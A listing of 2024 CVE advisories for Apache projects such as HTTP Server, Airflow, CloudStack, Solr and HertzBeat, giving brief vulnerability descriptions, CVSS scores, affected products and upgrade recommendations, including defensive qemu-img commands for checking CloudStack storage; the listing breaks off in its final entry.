CVE-2024-38476

The core of Apache HTTP Server 2.4.59 and earlier is vulnerable to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
netapp clustered_data_ontap 9.0
CVE-2024-38477

Null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
netapp clustered_data_ontap 9.0
CVE-2024-38479

Improper Input Validation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.11, from 9.0.0 through 9.2.5. Users are recommended to upgrade to version 9.2.6, which fixes the issue, or 10.0.2, which does not have the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-38503

When editing a user, group or any object in the Syncope Console, HTML tags could be added to any text field and could lead to potential exploits. The same vulnerability was found in the Syncope Enduser, when editing “Personal Information” or “User Requests”. Users are recommended to upgrade to version 3.0.8, which fixes this issue.

Products Affected

Vendor Product Version
apache syncope *
CVE-2024-38856

Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-39573

Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly set up URLs to be handled by mod_proxy. Users are recommended to upgrade to version 2.4.60, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
netapp ontap 9
CVE-2024-39676

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Pinot. This issue affects Apache Pinot: from 0.1 before 1.0.0. Users are recommended to upgrade to version 1.0.0 and configure RBAC, which fixes the issue. Details: A request to the path "/appconfigs" on the controller can lead to the disclosure of sensitive information such as system information (e.g. arch, OS version), environment information (e.g. maxHeapSize) and Pinot configurations (e.g. ZooKeeper path). This issue was addressed by Role-based Access Control (https://docs.pinot.apache.org/operators/tutorials/authentication/basic-auth-access-control), so that /appConfigs and all other APIs can be access-controlled; only authorized users have access to them. Note that the user needs to add the admin role according to the RBAC guide to control access to this endpoint; a default admin role is planned to be added in a future version of Pinot.

Products Affected

Vendor Product Version
apache pinot *
CVE-2024-39863

Apache Airflow versions before 2.9.3 have a vulnerability that allows an authenticated attacker to inject a malicious link when installing a provider. Users are recommended to upgrade to version 2.9.3, which fixes this issue.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-39864

The CloudStack integration API service allows running its unauthenticated API server (usually on port 8096 when configured and enabled via integration.api.port global setting) for internal portal integrations and for testing purposes. By default, the integration API service port is disabled and is considered disabled when integration.api.port is set to 0 or negative. Due to an improper initialisation logic, the integration API service would listen on a random port when its port value is set to 0 (default value). An attacker that can access the CloudStack management network could scan and find the randomised integration API service port and exploit it to perform unauthorised administrative actions and perform remote code execution on CloudStack managed hosts and result in complete compromise of the confidentiality, integrity, and availability of CloudStack managed infrastructure. Users are recommended to restrict the network access on the CloudStack management server hosts to only essential ports. Users are recommended to upgrade to version 4.18.2.1, 4.19.0.2 or later, which addresses this issue.

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-39877

Apache Airflow 2.4.0, and versions before 2.9.3, has a vulnerability that allows authenticated DAG authors to craft a doc_md parameter in a way that could execute arbitrary code in the scheduler context, which should be forbidden according to the Airflow Security model. Users should upgrade to version 2.9.3 or later which has removed the vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-39884

A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers.   "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted. Users are recommended to upgrade to version 2.4.61, which fixes this issue.

Products Affected

Vendor Product Version
netapp ontap_tools 10
apache http_server 2.4.60
CVE-2024-39887

An SQL Injection vulnerability in Apache Superset exists due to improper neutralization of special elements used in SQL commands. Specifically, certain engine-specific functions are not checked, which allows attackers to bypass Apache Superset's SQL authorization. To mitigate this, a new configuration key named DISALLOWED_SQL_FUNCTIONS has been introduced. This key disallows the use of the following PostgreSQL functions: version, query_to_xml, inet_server_addr, and inet_client_addr. Additional functions can be added to this list for increased protection. This issue affects Apache Superset: before 4.0.2. Users are recommended to upgrade to version 4.0.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-39928

In Apache Linkis <= 1.5.0, a random-string security vulnerability exists in Spark EngineConn: the random string used for the token when starting Py4j is generated with Commons Lang's RandomStringUtils. Users are recommended to upgrade to version 1.6.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache linkis *
CVE-2024-39954

CWE-918 Server-Side Request Forgery (SSRF) in the eventmesh-runtime module (WebhookUtil.java) of Apache EventMesh on Windows, Linux and macOS allows an attacker to abuse functionality on the server to read or update internal resources. Users are recommended to upgrade to version 1.12.0 or use the master branch, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache eventmesh *
CVE-2024-40725

A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted. Users are recommended to upgrade to version 2.4.62, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server 2.4.60
apache http_server 2.4.61
CVE-2024-40761

Inadequate Encryption Strength vulnerability in Apache Answer. This issue affects Apache Answer: through 1.3.5. Using the MD5 value of a user's email to access Gravatar is insecure and can lead to the leakage of user email. The official recommendation is to use SHA256 instead. Users are recommended to upgrade to version 1.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache answer *
CVE-2024-40898

SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context allows NTLM hashes to potentially be leaked to a malicious server via SSRF and malicious requests. Users are recommended to upgrade to version 2.4.62, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-41107

The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account. In such environments, this can result in a complete compromise of the resources owned and/or accessible by a SAML enabled user-account. Affected users are recommended to disable the SAML authentication plugin by setting the "saml2.enabled" global setting to "false", or upgrade to version 4.18.2.2, 4.19.1.0 or later, which addresses this issue.

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-41151

Deserialization of Untrusted Data vulnerability in Apache HertzBeat. This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat: before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2024-41169

In Apache Zeppelin, an attacker can use the Raft server protocol in an unauthenticated way and see the server's resources, including directories and files. This issue affects Apache Zeppelin: from 0.10.1 up to 0.12.0. Users are recommended to upgrade to version 0.12.0, which fixes the issue by removing the Cluster Interpreter.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-41172

In versions of Apache CXF before 3.6.4 and 4.0.5 (3.5.x and lower versions are not impacted), a CXF HTTP client conduit may prevent HTTPClient instances from being garbage collected, and it is possible that memory consumption will continue to increase, eventually causing the application to run out of memory.

Products Affected

Vendor Product Version
apache cxf *
CVE-2024-41177

Incomplete Blacklist to Cross-Site Scripting vulnerability in Apache Zeppelin. This issue affects Apache Zeppelin: before 0.12.0. Users are recommended to upgrade to version 0.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-41178

Exposure of temporary credentials in logs in Apache Arrow Rust Object Store (`object_store` crate), version 0.10.1 and earlier on all platforms using AWS WebIdentityTokens. On certain error conditions, the logs may contain the OIDC token passed to AssumeRoleWithWebIdentity (https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html). This allows someone with access to the logs to impersonate that identity, including performing their own calls to AssumeRoleWithWebIdentity, until the OIDC token expires. Typically OIDC tokens are valid for up to an hour, although this will vary depending on the issuer. Users are recommended to use a different AWS authentication mechanism, disable logging or upgrade to version 0.10.2, which fixes this issue. Details: When using AWS WebIdentityTokens with the object_store crate, in the event of a failure and automatic retry, the underlying reqwest error, including the full URL with the credentials, potentially in the parameters, is written to the logs. Thanks to Paul Hatcherian for reporting this vulnerability.

Products Affected

Vendor Product Version
apache arrow *
CVE-2024-41888

Missing Release of Resource after Effective Lifetime vulnerability in Apache Answer. This issue affects Apache Answer: through 1.3.5. The password reset link remains valid within its expiration period even after it has been used. This could potentially lead to the link being misused or hijacked. Users are recommended to upgrade to version 1.3.6, which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-41890

Missing Release of Resource after Effective Lifetime vulnerability in Apache Answer. This issue affects Apache Answer: through 1.3.5. A user can send multiple password reset emails, each containing a valid link. Within the links' validity period, this could potentially lead to a link being misused or hijacked. Users are recommended to upgrade to version 1.3.6, which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-41909

Like many other SSH implementations, Apache MINA SSHD suffered from the issue that is more widely known as CVE-2023-48795. An attacker that can intercept traffic between client and server could drop certain packets from the stream, potentially causing client and server to end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. The mitigations to prevent this type of attack were implemented in Apache MINA SSHD 2.12.0, on both the client and the server side. Users are recommended to upgrade to at least this version. Note that both the client and the server implementation must have mitigations applied against this issue; otherwise the connection may still be affected.

Products Affected

Vendor Product Version
apache mina_sshd *
CVE-2024-41937

Apache Airflow, versions before 2.10.0, have a vulnerability that allows the developer of a malicious provider to execute a cross-site scripting attack when clicking on a provider documentation link. This would require the provider to be installed on the web server and the user to click the provider link. Users should upgrade to 2.10.0 or later, which fixes this vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-42062

CloudStack account-users by default use username and password based authentication for API and UI access. Account-users can generate and register randomised API and secret keys and use them for the purpose of API-based automation and integrations. Due to an access permission validation issue that affects Apache CloudStack versions 4.10.0 up to 4.19.1.0, domain admin accounts were found to be able to query all registered account-users API and secret keys in an environment, including that of a root admin. An attacker who has domain admin access can exploit this to gain root admin and other-account privileges and perform malicious operations that can result in compromise of resources integrity and confidentiality, data loss, denial of service and availability of CloudStack managed infrastructure. Users are recommended to upgrade to Apache CloudStack 4.18.2.3 or 4.19.1.1, or later, which addresses this issue. Additionally, all account-user API and secret keys should be regenerated.

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-42222

In Apache CloudStack 4.19.1.0, a regression in the network listing API allows unauthorised list access to network details for domain admin and normal user accounts. This vulnerability compromises tenant isolation, potentially leading to unauthorised access to network details, configurations and data. Affected users are advised to upgrade to version 4.19.1.1 to address this issue. Users on older versions of CloudStack who are considering an upgrade can skip 4.19.1.0 and upgrade directly to 4.19.1.1.

Products Affected

Vendor Product Version
apache cloudstack 4.19.1.0
CVE-2024-42323

SnakeYaml deserialization vulnerability in Apache HertzBeat (incubating): loading malicious XML can lead to remote code execution (RCE). This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat (incubating): before 1.6.0. Users are recommended to upgrade to version 1.6.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2024-42447

Insufficient Session Expiration vulnerability in Apache Airflow Providers FAB. This issue affects Apache Airflow Providers FAB: 1.2.1 (when used with Apache Airflow 2.9.3) and FAB 1.2.0 for all Airflow versions. The FAB provider prevented the user from logging out.
* FAB provider 1.2.1 only affected Airflow 2.9.3 (earlier and later versions of Airflow are not affected)
* FAB provider 1.2.0 affected all versions of Airflow.
Users who run Apache Airflow 2.9.3 are recommended to upgrade to Apache Airflow Providers FAB version 1.2.2, which fixes the issue. Users who run any Apache Airflow version and have FAB provider 1.2.0 are recommended to upgrade to Apache Airflow Providers FAB version 1.2.2, which fixes the issue. Upgrading Apache Airflow to the latest available version is also recommended. Note: early versions of the Airflow reference container images for Airflow 2.9.3 and the constraint files contained FAB provider 1.2.1, but this is fixed in updated versions of the images. Users are advised to pull the latest Airflow images or reinstall the FAB provider according to the current constraints.

Products Affected

Vendor Product Version
apache apache-airflow-providers-fab 1.2.1
apache apache-airflow-providers-fab 1.2.0
CVE-2024-42516

HTTP response splitting in the core of Apache HTTP Server allows an attacker who can manipulate the Content-Type response headers of applications hosted or proxied by the server to split the HTTP response. This vulnerability was described as CVE-2023-38709, but the patch included in Apache HTTP Server 2.4.59 did not address the issue. Users are recommended to upgrade to version 2.4.64, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-43115

Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can execute arbitrary shell scripts on the server via an alert script. This issue affects Apache DolphinScheduler: before 3.2.2. Users are recommended to upgrade to version 3.3.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2024-43166

Incorrect Default Permissions vulnerability in Apache DolphinScheduler. This issue affects Apache DolphinScheduler: before 3.2.2. Users are recommended to upgrade to version 3.3.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2024-43204

SSRF in Apache HTTP Server with mod_proxy loaded allows an attacker to send outbound proxy requests to a URL controlled by the attacker. Requires an unlikely configuration where mod_headers is configured to modify the Content-Type request or response header with a value provided in the HTTP request. Users are recommended to upgrade to version 2.4.64, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-43383

Deserialization of Untrusted Data vulnerability in Apache Lucene.Net.Replicator. This issue affects Apache Lucene.NET's Replicator library: from 4.8.0-beta00005 through 4.8.0-beta00016. An attacker that can intercept traffic between a replication client and server, or control the target replication node URL, can provide a specially-crafted JSON response that is deserialized as an attacker-provided exception type. This can result in remote code execution or other potential unauthorized access. Users are recommended to upgrade to version 4.8.0-beta00017, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.1 5.9

Products Affected

Vendor Product Version
apache lucene.net 4.8.0
CVE-2024-43394

Server-Side Request Forgery (SSRF) in Apache HTTP Server on Windows can potentially leak NTLM hashes to a malicious server via mod_rewrite or Apache expressions that pass unvalidated request input. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.63. Note: The Apache HTTP Server Project will be setting a higher bar for accepting vulnerability reports regarding SSRF via UNC paths. The server offers limited protection against administrators directing the server to open UNC paths. Windows servers should limit the hosts they will connect to over SMB, given the nature of NTLM authentication.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2024-43441

Authentication Bypass by Assumed-Immutable Data vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.5.0. Users are recommended to upgrade to version 1.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hugegraph *
CVE-2024-44088

Malicious script injection ('Cross-site Scripting') vulnerability in Apache Geode web-api (REST). This vulnerability allows an attacker that tricks a logged-in user into clicking a specially-crafted link to execute code on the returned page, which could lead to theft of the user's session information and even account takeover. This issue affects Apache Geode: all versions prior to 1.15.2. Users are recommended to upgrade to version 1.15.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache geode *
CVE-2024-45031

When editing objects in the Syncope Console, incomplete HTML tags could be used to bypass HTML sanitization. This made it possible to inject stored XSS payloads which would trigger for other users during ordinary usage of the application. XSS payloads could also be injected in Syncope Enduser when editing “Personal Information” or “User Requests”: such payloads would trigger for administrators in Syncope Console, thus enabling session hijacking. Users are recommended to upgrade to version 3.0.9, which fixes this issue.

Products Affected

Vendor Product Version
apache syncope *
CVE-2024-45033

Insufficient Session Expiration vulnerability in Apache Airflow Fab Provider. This issue affects Apache Airflow Fab Provider: before 1.5.2. When a user's password was changed with the admin CLI, the sessions for that user were not cleared, leading to insufficient session expiration: logged-in users could remain logged in even after the password was changed. This only happened when the password was changed with the CLI. The problem does not occur when the change is made via the webserver, so this is different from CVE-2023-40273 (https://github.com/advisories/GHSA-pm87-24wq-r8w9), which was addressed in Apache Airflow 2.7.0. Users are recommended to upgrade to version 1.5.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache apache-airflow-providers-fab *
CVE-2024-45034

Apache Airflow versions before 2.10.1 have a vulnerability that allows DAG authors to add local settings to the DAG folder and get them executed by the scheduler, even though the scheduler is not supposed to execute code submitted by the DAG author. Users are advised to upgrade to version 2.10.1 or later, which has fixed the vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-45106

Improper authentication of an HTTP endpoint in the S3 Gateway of Apache Ozone 1.4.0 allows any authenticated Kerberos user to revoke and regenerate the S3 secrets of any other user. This is only possible if:
* ozone.s3g.secret.http.enabled is set to true. The default value of this configuration is false.
* The user configured in ozone.s3g.kerberos.principal is also configured in ozone.s3.administrators or ozone.administrators.
Users are recommended to upgrade to Apache Ozone version 1.4.1, which disables the affected endpoint.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache ozone 1.4.0
CVE-2024-45195

Direct Request ('Forced Browsing') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.16. Users are recommended to upgrade to version 18.12.16, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-45216

Improper Authentication vulnerability in Apache Solr. Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to authentication bypass. A fake ending appended to any Solr API URL path will allow requests to skip authentication while maintaining the API contract with the original URL path. This fake ending looks like an unprotected API path; however, it is stripped off internally after authentication but before API routing. This issue affects Apache Solr: from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0. Users are recommended to upgrade to version 9.7.0 or 8.11.4, which fix the issue.

Products Affected

Vendor Product Version
apache solr *
CVE-2024-45217

Insecure Default Initialization of Resource vulnerability in Apache Solr. New ConfigSets that are created via a Restore command, which copy a configSet from the backup and give it a new name, are created without setting the "trusted" metadata. ConfigSets that do not contain the flag are trusted implicitly if the metadata is missing, therefore this leads to "trusted" ConfigSets that may not have been created with an Authenticated request. "trusted" ConfigSets are able to load custom code into classloaders, therefore the flag is supposed to only be set when the request that uploads the ConfigSet is Authenticated & Authorized. This issue affects Apache Solr: from 6.6.0 before 8.11.4, from 9.0.0 before 9.7.0. This issue does not affect Solr instances that are secured via Authentication/Authorization. Users are primarily recommended to use Authentication and Authorization when running Solr. However, upgrading to version 9.7.0, or 8.11.4 will mitigate this issue otherwise.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache solr *
CVE-2024-45219

Account users in Apache CloudStack by default are allowed to upload and register templates for deploying instances and volumes for attaching them as data disks to their existing instances. Due to missing validation checks for KVM-compatible templates or volumes in CloudStack 4.0.0 through 4.18.2.3 and 4.19.0.0 through 4.19.1.1, an attacker that can upload or register templates and volumes can use them to deploy malicious instances or attach uploaded volumes to their existing instances on KVM-based environments and exploit this to gain access to the host filesystems, which could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of KVM-based infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack 4.18.2.4 or 4.19.1.2, or later, which addresses this issue. Additionally, all user-uploaded or registered KVM-compatible templates and volumes can be scanned and checked to confirm that they are flat files that do not use any additional or unnecessary features. For example, operators can run the following on their secondary storage(s) and inspect the output. An empty output for the disk being validated means it has no references to the host filesystems; on the other hand, if the output for the disk being validated is not empty, it might indicate a compromised disk. (The regex and the file name are quoted below so that the shell does not glob-expand or word-split them.)

for file in $(find /path/to/storage/ -type f -regex '[a-f0-9\-]*.*'); do echo "Retrieving file [$file] info. If the output is not empty, that might indicate a compromised disk; check it carefully."; qemu-img info -U "$file" | grep file: ; printf "\n\n"; done

The command can also be run for the file-based primary storages; however, bear in mind that (i) volumes created from templates will have references to the templates at first and (ii) volumes can be consolidated while migrating, losing their references to the templates. Therefore, running the command on the primary storages can show both false positives and false negatives.
For checking the whole set of template/volume features of each disk, operators can run the following command:

for file in $(find /path/to/storage/ -type f -regex '[a-f0-9\-]*.*'); do echo "Retrieving file [$file] info."; qemu-img info -U "$file"; printf "\n\n"; done

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-45384

Padding Oracle vulnerability in the Apache Druid extension druid-pac4j. This could allow an attacker to manipulate a pac4j session cookie. This issue affects Apache Druid versions 0.18.0 through 30.0.0. Since the druid-pac4j extension is optional and disabled by default, Druid installations not using the druid-pac4j extension are not affected by this vulnerability. While we are not aware of a way to meaningfully exploit this flaw, we nevertheless recommend upgrading to version 30.0.1 or higher, which fixes the issue, and ensuring you have a strong druid.auth.pac4j.cookiePassphrase as a precaution.

Products Affected

Vendor Product Version
apache druid *
CVE-2024-45387

An SQL injection vulnerability in Traffic Ops in Apache Traffic Control >= 8.0.0, <= 8.0.1 allows a privileged user with role "admin", "federation", "operations", "portal", or "steering" to execute arbitrary SQL against the database by sending a specially-crafted PUT request. Users are recommended to upgrade to Apache Traffic Control version 8.0.2 if they run an affected version of Traffic Ops.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
security@apache.org 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 3.1 6.0

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2024-45461

The CloudStack Quota feature allows cloud administrators to implement a quota or usage limit system for cloud resources, and is disabled by default. In environments where the feature is enabled, due to missing access check enforcement, non-administrative CloudStack user accounts are able to access and modify quota-related configurations and data. This issue affects Apache CloudStack from 4.7.0 through 4.18.2.3 and from 4.19.0.0 through 4.19.1.1, where the Quota feature is enabled. Users are recommended to upgrade to Apache CloudStack 4.18.2.4 or 4.19.1.2, or later, which addresses this issue. Alternatively, users that do not use the Quota feature are advised to disable the plugin by setting the global setting "quota.enable.service" to "false".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.7 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:L 0.9 4.7

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-45462

The logout operation in the CloudStack web interface does not expire the user session completely; the session remains valid until it expires by time or the backend service is restarted. An attacker that has access to a user's browser can use an unexpired session to gain access to resources owned by the logged-out user account. This issue affects Apache CloudStack from 4.15.1.0 through 4.18.2.3 and from 4.19.0.0 through 4.19.1.1. Users are recommended to upgrade to Apache CloudStack 4.18.2.4 or 4.19.1.2, or later, which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.3 MEDIUM CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N 1.0 5.2

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-45477

Apache NiFi 1.10.0 through 1.27.0 and 2.0.0-M1 through 2.0.0-M3 support a description field for Parameters in a Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.28.0 or 2.0.0-M4 is the recommended mitigation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.6 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 2.1 2.5

Products Affected

Vendor Product Version
apache nifi 2.0.0
apache nifi *
CVE-2024-45478

Stored XSS vulnerability in Edit Service Page of Apache Ranger UI in Apache Ranger Version 2.4.0. Users are recommended to upgrade to version Apache Ranger 2.5.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 1.7 2.7

Products Affected

Vendor Product Version
apache ranger *
CVE-2024-45479

SSRF vulnerability in Edit Service Page of Apache Ranger UI in Apache Ranger Version 2.4.0. Users are recommended to upgrade to version Apache Ranger 2.5.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache ranger *
CVE-2024-45498

Example DAG: example_inlet_event_extra.py shipped with Apache Airflow version 2.10.0 has a vulnerability that allows an authenticated attacker with only DAG trigger permission to execute arbitrary commands. If you used that example as the base of your DAGs, please review whether you have copied the dangerous example; see https://github.com/apache/airflow/pull/41873 for more information. We recommend against exposing the example DAGs in your deployment. If you must expose the example DAGs, upgrade Airflow to version 2.10.1 or later.

Products Affected

Vendor Product Version
apache airflow 2.10.0
CVE-2024-45505

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache HertzBeat (incubating). This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat (incubating): before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue.

CVSS 3.x

